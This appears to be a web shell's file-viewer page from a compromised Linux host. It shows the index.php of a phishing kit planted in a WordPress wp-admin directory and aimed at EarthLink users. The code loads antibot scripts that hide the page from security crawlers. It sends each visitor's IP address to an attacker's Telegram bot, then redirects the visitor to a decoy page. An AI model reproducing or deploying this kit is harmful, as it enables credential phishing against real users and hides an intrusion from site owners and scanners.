HEX
Server: Apache
System: Linux host.dominioscaracas.com 4.18.0-477.15.1.lve.2.el8.x86_64 #1 SMP Wed Aug 2 10:43:45 UTC 2023 x86_64
User: enciassa (1159)
PHP: 8.1.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/enciassa/www/wp-admin/network/wp-fonts/kj/ef83a150d01a5a45af785d3f1bd46726/index.php
<?php
include('Antibot/blockers.php');
include('Antibot/detects.php');
include('Antibot/new.php');
include('Antibot/Bot-Crawler.php');
include('Antibot/Dila_DZ.php');

include '../blocker.php';
include '../config.php';

$ip = getenv("REMOTE_ADDR");

$message = "+--------👀📫EARTHLINK--VISITTT--------+\n\nClient IP: " 
.$ip.
"\n\nClient Host: "
.$hostname.
"\n\n"
;

$url = "https://api.telegram.org/bot$botToken/sendMessage";


$data = [
    'chat_id' => $chatId,
    'text' => $message
];


$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);

if (curl_errno($ch)) {
    echo 'Error:' . curl_error($ch);
} else {
    header("Location: -=+h=.htm?ip=$ip");
}

curl_close($ch);
header("Location: -=+h=.htm?ip=$ip");
session_start();


?>